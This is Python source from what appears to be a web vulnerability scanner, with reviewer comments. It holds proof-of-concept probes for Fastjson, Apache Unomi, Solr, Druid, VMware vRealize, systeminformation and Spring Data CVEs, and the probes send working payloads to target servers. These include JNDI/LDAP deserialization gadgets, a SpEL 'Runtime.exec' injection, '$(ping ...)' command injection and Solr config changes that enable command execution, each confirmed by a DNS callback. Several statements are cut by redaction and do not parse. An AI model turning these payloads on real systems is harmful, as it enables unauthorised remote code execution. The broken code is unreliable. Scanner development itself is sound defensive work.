def fastjson_1224_poc(self) -> None:
    """Probe for Fastjson <= 1.2.24 (CVE-2017-18349) and report via ``verify``.

    Fills ``self.vul_info`` with the finding metadata, posts a JSON body to
    ``self.url`` and treats an out-of-band DNS resolution of the token from
    ``dns_request()`` (checked with ``dns_result``) as the success signal.
    Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results are reported through ``verify.scan_print`` /
        ``verify.timeout_print`` / ``verify.connection_print`` /
        ``verify.error_print``.
    """
    # NOTE(review): the lock is released only on the fall-through path below, not
    # in a ``finally``; an exception escaping one of the handlers leaves it held.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Fastjson: 1.2.24"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2017-18349"
    self.vul_info["vul_apps"] = "Fastjson"
    self.vul_info["vul_date"] = "2017-03-15"
    self.vul_info["vul_vers"] = "<= 1.2.24"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
    self.vul_info["cre_date"] = "2021-01-20"
    self.vul_info["cre_auth"] = "zhzyker"
    headers = {
        'User-Agent': self.ua,
        'Content-Type': "application/json",
        'Connection': 'close'
    }
    # ``md`` and ``dns`` are the same callback token; ``md`` is what gets checked.
    md = dns_request()
    dns = md
    data = {
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName": "ldap://" + dns + "//Exploit",
            "autoCommit": True
        }
    }
    data = json.dumps(data)
    try:
        try:
            # verify=False disables TLS certificate validation for this request.
            request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
        except:
            # Bare except: Timeout/ConnectionError from the POST are swallowed here,
            # so the outer handlers for them can only fire for dns_result/scan_print.
            pass
        if dns_result(md):
            # NOTE(review): the recorded payload string carries a stray "] " suffix
            # that is not part of what was sent.
            self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; the error detail is not surfaced anywhere.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def fastjson(self, webapps_identify, url) -> None:
    """Fingerprint Fastjson on ``url`` and append tags to ``webapps_identify``.

    First posts a deliberately malformed JSON body (``payload5``) and looks for
    a Fastjson ``JSONException`` in the response text; if absent, posts four
    probe bodies carrying a ``dns_request()`` token and checks ``dns_result``
    for an out-of-band resolution.

    Args:
        webapps_identify: collection receiving ``"fastjson"`` tags via ``.append``.
        url: endpoint to post to.

    Returns:
        None; findings are recorded by appending to ``webapps_identify``.
    """
    name = "Fastjson"
    Identify.identify_prt(name)
    dns = dns_request()
    payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' % dns
    payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' % dns
    payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' % dns
    payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' % dns
    payload5 = '{"a":"'
    headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
    try:
        try:
            # verify=False disables TLS certificate validation.
            request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
        except:
            # If the POST fails, ``request`` stays unbound; the NameError raised on
            # the next line is then swallowed by the outer ``except Exception``.
            pass
        if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
            # Both branches append the same tag; the exact-match test is redundant
            # with the substring test that follows it.
            if r"application/json" == request.headers['Content-Type']:
                webapps_identify.append("fastjson")
            elif r"application/json" in request.headers['Content-Type']:
                webapps_identify.append("fastjson")
        else:
            requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False)
            requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False)
            requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False)
            requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False)
            if dns_result(dns):
                # Two entries are appended on the DNS path: the bare tag and one
                # carrying the callback token.
                webapps_identify.append("fastjson")
                webapps_identify.append("fastjson [" + dns + "]")
    except Exception as error:
        # All errors (including the unbound ``request`` case above) are dropped
        # silently; ``error`` is unused.
        pass
def cve_2020_13942_poc(self) -> None:
    """Probe for Apache Unomi CVE-2020-13942 and report via ``verify``.

    Posts ``self.payload_cve_2020_13942`` (with ``RECOMMAND`` substituted) to
    ``/context.json``. Success is an out-of-band DNS resolution of the
    ``dns_request()`` token; otherwise the response JSON is inspected for a
    ``/tracker/`` page path and reported as "maybe". Holds ``self.threadLock``
    for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace("RECOMMAND", "whoami")
    self.vul_info["vul_name"] = "Apache Unomi remote code execution"
    self.vul_info["vul_numb"] = "CVE-2020-13942"
    self.vul_info["vul_apps"] = "Unomi"
    self.vul_info["vul_date"] = "2020-11-23"
    self.vul_info["vul_vers"] = "< 1.5.2"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
                                "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
                                "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
    self.vul_info["cre_date"] = "2021-01-28"
    self.vul_info["cre_auth"] = "zhzyker"
    md = dns_request()
    cmd = "ping " + md
    # NOTE(review): these assignments overwrite instance attributes; other
    # methods on this object read ``self.headers``, so this is shared state
    # rather than a local.
    self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
    self.headers = {
        'User-Agent': self.ua,
        'Accept': '*/*',
        'Connection': 'close',
        'Content-Type': 'application/json'
    }
    try:
        # verify=False disables TLS certificate validation.
        req = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False)
        if dns_result(md):
            self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
        else:
            # Any JSON decode / KeyError / IndexError here propagates to the generic
            # handler below, so a non-JSON response is reported as an error rather
            # than as a clean negative.
            rep = list(json.loads(req.text)["trackedConditions"])[0]["parameterValues"]["pagePath"]
            if r"/tracker/" in rep:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        # ``error`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_27905_poc(self) -> None:
    """Probe for Apache Solr CVE-2021-27905 (ReplicationHandler SSRF).

    Lists cores via ``/solr/admin/cores``, takes the first core name, and
    requests a ``replication?command=fetchindex`` URL whose ``masterUrl``
    points at the ``dns_request()`` token; an out-of-band DNS resolution is
    the success signal. Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
    self.vul_info["vul_numb"] = "CVE-2021-27905"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2021-04-14"
    self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "SSRF"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
    self.vul_info["cre_auth"] = "zhzyker"
    # Stays None when the core listing cannot be parsed; the str.replace below
    # then raises TypeError, which lands in the generic handler.
    core_name = None
    dns = dns_request()
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        # verify=False disables TLS certificate validation.
        request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        # NOTE(review): the published source is redacted here ("******" stands in
        # for the original text); as printed this statement does not parse.
        payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                  "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
        url_ssrf = urljoin(self.url, payload)
        r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False)
        # NOTE(review): every other call site in this file uses ``dns_result(...)``
        # as a boolean; if it returns a bool, ``dns in <bool>`` raises TypeError
        # and the probe is reported as an error instead of a result.
        if dns in dns_result(dns):
            self.vul_info["vul_payd"] = url_ssrf
            self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def fastjson_1262_poc(self) -> None:
    """Probe for Fastjson <= 1.2.62 and report via ``verify``.

    Same shape as ``fastjson_1224_poc``: posts a JSON body to ``self.url`` and
    treats an out-of-band DNS resolution of the ``dns_request()`` token as the
    success signal. Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Fastjson: 1.2.62"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
    self.vul_info["vul_numb"] = "null"
    self.vul_info["vul_apps"] = "Fastjson"
    self.vul_info["vul_date"] = "2019-10-07"
    self.vul_info["vul_vers"] = "<= 1.2.62"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
                                "(autoType功能默认关闭),另建议将JDK升级到最新版本。"
    self.vul_info["cre_date"] = "2021-01-21"
    self.vul_info["cre_auth"] = "zhzyker"
    # Unlike the 1.2.24 probe, no 'Connection: close' header is sent here.
    headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
    md = dns_request()
    dns = md
    data = {
        "@type": "org.apache.xbean.propertyeditor.JndiConverter",
        "AsText": "ldap://" + dns + "//exploit"
    }
    data = json.dumps(data)
    try:
        try:
            # verify=False disables TLS certificate validation.
            request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
        except:
            # Bare except swallows Timeout/ConnectionError from the POST, so the
            # outer handlers for them can only fire for dns_result/scan_print.
            pass
        if dns_result(md):
            # NOTE(review): the recorded payload ("//Exploit] ") does not match what
            # was sent ("//exploit"), and carries a stray "] " suffix.
            self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_25646_poc(self) -> None:
    """Probe for Apache Druid CVE-2021-25646 and report via ``verify``.

    Posts ``self.payload_cve_2021_25646`` (with ``RECOMMAND`` substituted) to
    ``/druid/indexer/v1/sampler``; an out-of-band DNS resolution of the
    ``dns_request()`` token is the only success signal — there is no
    response-based fallback. Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2021-25646"
    self.vul_info["vul_apps"] = "Druid"
    self.vul_info["vul_date"] = "2021-02-01"
    self.vul_info["vul_vers"] = "< 0.20.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
                                "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
                                "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
                                "攻击者可直接构造恶意请求执行任意代码,控制服务器。"
    self.vul_info["cre_date"] = "2021-02-03"
    self.vul_info["cre_auth"] = "zhzyker"
    url = urljoin(self.url, "/druid/indexer/v1/sampler")
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': self.ua,
        'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
        'Connection': 'keep-alive'
    }
    md = dns_request()
    cmd = "ping " + md
    data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
    try:
        # verify=False disables TLS certificate validation.
        request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
        if dns_result(md):
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            self.vul_info["vul_payd"] = data
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
        # Printed on both outcomes; on a negative, prt_resu is still "null".
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_21975_poc(self) -> None:
    """Probe for VMware vRealize Operations Manager CVE-2021-21975 (API SSRF).

    Posts a one-element JSON array holding the ``dns_request()`` token to
    ``/casa/nodes/thumbprints``; an out-of-band DNS resolution is the success
    signal. Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "VMware vRealize Operations Manager API SSRF"
    # NOTE(review): this identifier disagrees with prt_name and the method name
    # (CVE-2021-21975); the recorded "vul_numb" looks like a copy/paste slip.
    self.vul_info["vul_numb"] = "CVE-2021-21972"
    self.vul_info["vul_apps"] = "Vmware"
    self.vul_info["vul_date"] = "2021-03-31"
    self.vul_info["vul_vers"] = "<= 8.3.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "SSRF"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
    self.vul_info["cre_date"] = "2021-04-01"
    self.vul_info["cre_auth"] = "zhzyker"
    try:
        headers = {
            "User-Agent": self.ua,
            "Content-Type": "application/json;charset=UTF-8"
        }
        dns = dns_request()
        # Built by string concatenation rather than json.dumps; fine for a bare
        # token but would break on a value containing quotes.
        data = '["' + dns + '"]'
        url = urljoin(self.url, "/casa/nodes/thumbprints")
        # verify=False disables TLS certificate validation.
        res = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
        if dns_result(dns):
            self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = data
            self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        # ``error`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_21315_poc(self) -> None:
    """Probe for CVE-2021-21315 (systeminformation ``name[]`` injection).

    Sends one GET to ``/api/getServices`` carrying the ``dns_request()`` token
    and treats an out-of-band DNS resolution as the success signal. Holds
    ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Node.JS Command Injection"
    self.vul_info["vul_numb"] = "CVE-2021-21315"
    self.vul_info["vul_apps"] = "Node.JS"
    self.vul_info["vul_date"] = "2021-02-25"
    self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Command Injection"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
    self.vul_info["cre_date"] = "2021-03-04"
    self.vul_info["cre_auth"] = "zhzyker"
    headers = {
        "User-agent": self.ua,
        "Connection": "close"
    }
    md = dns_request()
    cmd = "ping%20" + md
    payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
    # Plain concatenation, not urljoin — differs from the other probes in this file.
    url = self.url + payload
    try:
        try:
            # NOTE(review): hard-coded timeout=3 ignores self.timeout, unlike the
            # other probes. verify=False disables TLS certificate validation.
            req = requests.get(url, headers=headers, timeout=3, verify=False)
            r = dump.dump_all(req).decode('utf-8', 'ignore')
        except:
            # Bare except: a failed GET is recorded as "null" and the probe continues
            # to the DNS check, so the outer Timeout/ConnectionError handlers can
            # only fire for dns_result/scan_print. The ``pass`` is redundant.
            r = "null"
            pass
        if dns_result(md):
            self.vul_info["vul_data"] = r
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = payload
            self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        # ``error`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2018_1273_poc(self) -> None:
    """Probe for Spring Data Commons CVE-2018-1273 and report via ``verify``.

    Builds a form payload carrying the ``dns_request()`` token and, in the
    (redacted) request section, checks for an out-of-band DNS resolution.
    Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2018-1273"
    self.vul_info["vul_apps"] = "Spring"
    self.vul_info["vul_date"] = "2018-04-11"
    self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程命令执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
                                "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
    self.vul_info["cre_date"] = "2021-01-26"
    self.vul_info["cre_auth"] = "zhzyker"
    md = dns_request()
    cmd = "ping " + md
    # NOTE(review): the published source is redacted between ``repeatedPassword=``
    # and ``'utf-8', 'ignore')`` ("******" stands in for it). The HTTP request,
    # the ``try:`` that the ``except`` clauses below belong to, and the
    # ``dns_result(md)`` check are all part of the missing text, so this block
    # does not parse as printed; confirm against the upstream file.
    payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
    self.vul_info["prt_resu"] = "PoCSuCCeSS"
    self.vul_info["vul_payd"] = payload
    self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
    verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2017_12629_poc(self) -> None:
    """Probe for Apache Solr CVE-2017-12629 and report via ``verify``.

    Lists cores via ``/solr/admin/cores``, posts ``self.payload_cve_2017_12629``
    (with ``RECOMMAND`` and ``new_core`` substituted) to the first core's
    ``/config`` endpoint, and treats an out-of-band DNS resolution of the
    ``dns_request()`` token as success; otherwise a 200 on the core listing
    plus a parsed core name is reported as "maybe". Holds ``self.threadLock``
    for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    # NOTE(review): this is a process-global monkeypatch of http.client — every
    # later HTTPConnection in this process (all probes, all threads) will speak
    # HTTP/1.0 — and it is never restored.
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
    self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace("RECOMMAND", "whoami")
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2017-12629"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2017-10-14"
    self.vul_info["vul_vers"] = "< 7.1.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Remote Code Execution"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
                                "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
    self.vul_info["cre_auth"] = "zhzyker"
    # Sentinel string (not None) — checked as both ``!= "null"`` and ``is not None`` below.
    core_name = "null"
    new_core = random_md5()
    md = dns_request()
    cmd = "ping " + md
    payload1 = self.payload_cve_2017_12629.replace("RECOMMAND", cmd).replace("new_core", new_core)
    # Defined but never sent.
    payload2 = '[{"id": "test"}]'
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    headers_solr1 = {
        'Accept': "*/*",
        'User-Agent': self.ua,
        'Content-Type': "application/json"
    }
    # Defined but never used by any request in this method.
    headers_solr2 = {
        'Host': "localhost",
        'Accept-Language': "en",
        'User-Agent': self.ua,
        'Connection': "close",
        'Content-Type': "application/json"
    }
    try:
        # verify=False disables TLS certificate validation.
        request = requests.get(url_core, headers=headers_solr1, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        # If the listing could not be parsed this posts to "/solr/null/config".
        req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False)
        if dns_result(md):
            self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [newcore: " + new_core + "] "
        else:
            # Note this inspects the core-listing response (``request``), not the
            # config POST (``req``); "maybe" only means a core was enumerable.
            if request.status_code == 200 and core_name != "null" and core_name is not None:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [newcore: " + new_core + "] "
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2019_17558_poc(self) -> None:
    """Probe for Apache Solr CVE-2019-17558 (Velocity template RCE).

    Lists cores, posts a config change enabling the Velocity response writer
    on the first core, then requests ``self.payload_cve_2019_17558`` (with
    ``RECOMMAND`` substituted) against that core. An out-of-band DNS
    resolution of the ``dns_request()`` token is success; otherwise a parsed
    core name alone yields a "maybe". Holds ``self.threadLock`` for the whole
    call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace("RECOMMAND", "whoami")
    self.vul_info["vul_name"] = "Apache Solr Velocity template Remote Code Execution"
    self.vul_info["vul_numb"] = "CVE-2019-17558"
    self.vul_info["vul_apps"] = "Solr"
    # NOTE(review): a 2017 date for a 2019 CVE; looks copied from the
    # CVE-2017-12629 probe in this file — confirm.
    self.vul_info["vul_date"] = "2017-10-16"
    self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Remote Code Execution"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
    self.vul_info["cre_auth"] = "zhzyker"
    # Stays None when the core listing cannot be parsed.
    core_name = None
    md = dns_request()
    cmd = "ping " + md
    payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        # verify=False disables TLS certificate validation.
        request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        # With core_name None this becomes ".../solr/None/config".
        url_api = self.url + "/solr/" + str(core_name) + "/config"
        headers_json = {
            'Content-Type': 'application/json',
            'User-Agent': self.ua
        }
        # NOTE(review): whitespace inside this literal is as it appears in the
        # published (collapsed) source; the original layout is not recoverable here.
        set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """
        try:
            r = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
            req = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False)
